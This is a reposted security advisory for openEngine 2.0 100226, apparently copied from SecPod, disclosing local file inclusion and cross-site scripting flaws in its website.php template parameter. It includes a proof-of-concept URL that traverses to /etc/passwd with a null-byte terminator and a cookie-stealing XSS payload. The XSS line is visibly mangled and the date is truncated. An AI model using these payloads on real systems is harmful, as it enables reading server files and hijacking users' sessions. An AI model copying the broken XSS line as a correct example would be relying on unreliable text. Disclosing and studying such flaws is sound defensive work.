openEngine 2.0 100226 本地文件包含和跨站脚本漏洞

2024-08-29

openEngine 2.0 100226 本地文件包含和跨站脚本漏洞

openEngine 2.0 100226 本地文件包含和跨站脚本漏洞 篇1

[+]info:

~~~~~~~~~

openEngine 2.0 100226 LFI and XSS Vulnerabilities

Vendor : www.openengine.de

Advisory : secpod.org/blog/?p=152

secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt

Version : openEngine 2.0 100226; other versions may also be affected.

Download : www.openengine.de/download/openengine20_100226.zip

Date : 11/16/

[+]poc:

~~~~~~~~~

* local file inclusion,

localhost/cms/website.php?template=../../../../../../../../etc/passwd%00

* XSS,

alert(document.cookie)localhost/cms/website.php?template=

[+]Reference:

~~~~~~~~~

secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt

上一篇:临沂市公安局交通警察支队车辆管理所委托书下一篇:论鲁迅的婚姻与爱情